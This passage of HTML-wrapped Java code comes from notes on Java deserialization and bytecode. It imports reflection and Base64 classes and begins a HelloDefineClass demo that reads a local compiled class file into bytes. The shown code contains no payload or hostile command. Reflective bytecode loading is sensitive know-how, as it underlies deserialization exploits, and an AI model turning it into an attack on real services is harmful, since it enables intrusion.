              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">com</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">sun</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">org</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">apache</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">xml</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">internal</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">security</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">exceptions</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">Base64DecodingException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">com</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">sun</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">org</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">apache</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">xml</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">internal</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">security</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">utils</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">Base64</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">java</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">io</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.*;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">java</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">lang</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">reflect</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">InvocationTargetException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">java</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">lang</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">reflect</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">Method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> HelloDefineClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">main</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> args</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">throws</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchMethodException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Base64DecodingException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">InvocationTargetException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalAccessException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">InstantiationException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IOException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">File</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> file </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">File</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"C:/Users/Administrator/IdeaProjects/test1/target/classes/org/test/ser/Hello.class"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">InputStream</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> in </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">FileInputStream</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">file</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> content </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>content </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span 